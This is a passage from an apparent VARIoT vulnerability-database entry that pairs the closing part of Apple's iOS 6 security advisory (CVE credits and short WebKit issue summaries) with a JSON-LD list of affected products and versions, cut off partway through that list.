CVE-2011-3924 : Arthur Gerkis CVE-2011-3926 : Arthur Gerkis CVE-2011-3958 : miaubiz CVE-2011-3966 : Aki Helin of OUSPG CVE-2011-3968 : Arthur Gerkis CVE-2011-3969 : Arthur Gerkis CVE-2011-3971 : Arthur Gerkis CVE-2012-0682 : Apple Product Security CVE-2012-0683 : Dave Mandelin of Mozilla CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-2818 : miaubiz CVE-2012-3589 : Dave Mandelin of Mozilla CVE-2012-3590 : Apple Product Security CVE-2012-3591 : Apple Product Security CVE-2012-3592 : Apple Product Security CVE-2012-3593 : Apple Product Security CVE-2012-3594 : miaubiz CVE-2012-3595 : Martin Barbella of Google Chrome Security CVE-2012-3596 : Skylined of the Google Chrome Security Team CVE-2012-3597 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3598 : Apple Product Security CVE-2012-3599 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3600 : David Levin of the Chromium development community CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer CVE-2012-3602 : miaubiz CVE-2012-3603 : Apple Product Security CVE-2012-3604 : Skylined of the Google Chrome Security Team CVE-2012-3605 : Cris Neckar of the Google Chrome Security team CVE-2012-3608 : Skylined of the Google Chrome Security Team CVE-2012-3609 : Skylined of the Google Chrome Security Team CVE-2012-3610 : Skylined of the Google Chrome Security Team CVE-2012-3611 : Apple Product Security CVE-2012-3612 : Skylined of the Google Chrome Security Team CVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3614 : Yong Li of Research In Motion, Inc. CVE-2012-3615 : Stephen Chenney of the Chromium development community CVE-2012-3617 : Apple Product Security CVE-2012-3618 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3620 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3624 : Skylined of the Google Chrome Security Team CVE-2012-3625 : Skylined of Google Chrome Security Team CVE-2012-3626 : Apple Product Security CVE-2012-3627 : Skylined and Abhishek Arya (Inferno) of Google Chrome Security team CVE-2012-3628 : Apple Product Security CVE-2012-3629 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3630 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3631 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3634 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3635 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3636 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3637 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3638 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3639 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3640 : miaubiz CVE-2012-3641 : Slawomir Blazek CVE-2012-3642 : miaubiz CVE-2012-3644 : miaubiz CVE-2012-3645 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3646 : Julien Chaffraix of the Chromium development community, Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3647 : Skylined of the Google Chrome Security Team CVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3651 : Abhishek Arya (Inferno) and Martin Barbella of the Google Chrome Security Team CVE-2012-3652 : Martin Barbella of Google Chrome Security Team CVE-2012-3653 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3655 : Skylined of the Google Chrome Security Team CVE-2012-3656 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3658 : Apple CVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3661 : Apple Product Security CVE-2012-3663 : Skylined of Google Chrome Security Team CVE-2012-3664 : Thomas Sepez of the Chromium development community CVE-2012-3665 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3666 : Apple CVE-2012-3667 : Trevor Squires of propaneapp.com CVE-2012-3668 : Apple Product Security CVE-2012-3669 : Apple Product Security CVE-2012-3670 : Abhishek Arya (Inferno) of the Google Chrome Security Team, Arthur Gerkis CVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome Security Team CVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3674 : Skylined of Google Chrome Security Team CVE-2012-3676 : Julien Chaffraix of the Chromium development community CVE-2012-3677 : Apple CVE-2012-3678 : Apple Product Security CVE-2012-3679 : Chris Leary of Mozilla CVE-2012-3680 : Skylined of Google Chrome Security Team CVE-2012-3681 : Apple CVE-2012-3682 : Adam Barth of the Google Chrome Security Team CVE-2012-3683 : wushi of team509 working with iDefense VCP CVE-2012-3684 : kuzzcc CVE-2012-3686 : Robin Cao of Torch Mobile (Beijing) CVE-2012-3703 : Apple Product Security CVE-2012-3704 : Skylined of the Google Chrome Security Team CVE-2012-3706 : Apple Product Security CVE-2012-3708 : Apple CVE-2012-3710 : James Robinson of Google CVE-2012-3747 : David Bloom of Cue
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site disclosure of information Description: A cross-origin issue existed in the handling of CSS property values. This issue was addressed through improved origin tracking. CVE-ID CVE-2012-3691 : Apple
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A malicious website may be able to replace the contents of an iframe on another site Description: A cross-origin issue existed in the handling of iframes in popup windows. This issue was addressed through improved origin tracking. CVE-ID CVE-2011-3067 : Sergey Glazunov
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site disclosure of information Description: A cross-origin issue existed in the handling of iframes and fragment identifiers. This issue was addressed through improved origin tracking. CVE-ID CVE-2012-2815 : Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, and Dan Boneh of the Stanford University Security Laboratory
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Look-alike characters in a URL could be used to masquerade a website Description: The International Domain Name (IDN) support and Unicode fonts embedded in Safari could have been used to create a URL which contains look-alike characters. These could have been used in a malicious website to direct the user to a spoofed site that visually appears to be a legitimate domain. This issue was addressed by supplementing WebKit's list of known look-alike characters. Look- alike characters are rendered in Punycode in the address bar. CVE-ID CVE-2012-3693 : Matt Cooley of Symantec
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A canonicalization issue existed in the handling of URLs. This may have led to cross-site scripting on sites which use the location.href property. This issue was addressed through improved canonicalization of URLs. CVE-ID CVE-2012-3695 : Masato Kinugawa
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to HTTP request splitting Description: An HTTP header injection issue existed in the handling of WebSockets. This issue was addressed through improved WebSockets URI sanitization. CVE-ID CVE-2012-3696 : David Belcher of the BlackBerry Security Incident Response Team
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A maliciously crafted website may be able to spoof the value in the URL bar Description: A state management issue existed in the handling of session history. Navigations to a fragment on the current page may cause Safari to display incorrect information in the URL bar. This issue was addressed through improved session state tracking. CVE-ID CVE-2011-2845 : Jordi Chancel
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the disclosure of the disclosure of memory contents Description: An uninitialized memory access issue existed in the handling of SVG images. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3650 : Apple
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "6.0".
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQWeYHAAoJEPefwLHPlZEwFlwP/1Ib/2m8K7orlPb3zmsKTyjo 3T0rFqu1LbXNzwLRhan7E7KiJoQ7U6yVO4045o/19AYZM+zGVNnHsCkUc3+Vcpa5 TZIM9Rik2iXKMxzttFfc5tvhE1u18PstsDLU/jvyW+s3XxMVL54wnSmW1R+P0de0 8+Q++IANogUj+scJzQkTaFDNDN5v1p0BT0+cifCcqktXB4H/PoaQ7drIWiDGYB/9 n4IL5AjM0BJBzWkldfjPimZ0BseSA0BxdeVCopmAgdnigyB60G4cWGzkU7E35VnP dWgdU9rnIIvGGe/vP912f7AoPtWs1b8n6DYCJgGRXvaRfPoHFUlXaRoVB6vJlMVs JXyMrw/RSDfYEgJdNbFOSxyJXHUkTkt4+aNW4KcoMR6raI/W5zKDyMEICw1wpkwP id6Dz4e6ncf+cfvAFqXpk02OC7iJqn71IJN2MvU/hC7797l++PINIoOHwJZolt+T xL3wV8p3Lk8K6lZx3Q9Tu6Dd7GYkxtjLCgV1NgdHOwPKDUOJ47oG6RjZAd6hpicp RqYXbk5bJpd3nZv+X6FrCZqGfeuwREWW7FJ0dI+/8ohlnisTz16f48W9FtuN3HIj bmxFJ46P4LGxrizwDSdBngxf3Utkh+7hGLuMH51/jR8+tCqDIEgpKBA+2F+IOmyP XtT4lS60xKz63YSg79dd =LvMt -----END PGP SIGNATURE----- . The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0137",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 2.0,
"vendor": "suse",
"version": "11"
},
{
"model": "chrome",
"scope": "lt",
"trust": 1.0,
"vendor": "google",
"version": "17.0.963.56"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.4"
},
{
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "6.0"
},
{
"model": "mac os x server",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.0"
},
{
"model": "mac os x server",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.5"
},
{
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.5"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.8"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.8"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "autonomy",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "emc",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hyland",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lotus",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nuance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "palisade",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "proofpoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "symantec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trend micro",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustwave",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "verdasys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "websense",
"version": null
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.100"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.8"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.42"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "linux enterprise sdk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.75"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.203"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.1"
},
{
"model": "aura session manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.105"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.7"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.7"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.1"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "messaging storage server sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.213"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.306"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.17"
},
{
"model": "firefox beta10",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.208"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.4"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "firefox beta6",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "lotus notes fix pack",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.34"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.15"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.12"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.21"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.127"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.16"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7.1"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.44"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.225"
},
{
"model": "lotus notes fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.33"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.8"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "ne",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.56"
},
{
"model": "messaging storage server sp9",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.107"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.219"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.36"
},
{
"model": "application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "aura system platform sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.218"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.217"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.1"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.19"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.20"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.2"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0.1"
},
{
"model": "linux enterprise server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.1"
},
{
"model": "aura experience portal sp2",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.3"
},
{
"model": "lotus notes fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.32"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.2"
},
{
"model": "aura application server sip core",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "firefox rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.120"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.77"
},
{
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "8.0"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.0.3"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "firefox beta8",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.209"
},
{
"model": "productions pale moon",
"scope": "ne",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.30"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.226"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.16"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.10"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.11"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.14"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.121"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.17"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "aura presence services sp2",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.13"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.77"
},
{
"model": "beta19",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.15"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.13"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.112"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.11"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.7"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.12"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.9"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.15"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
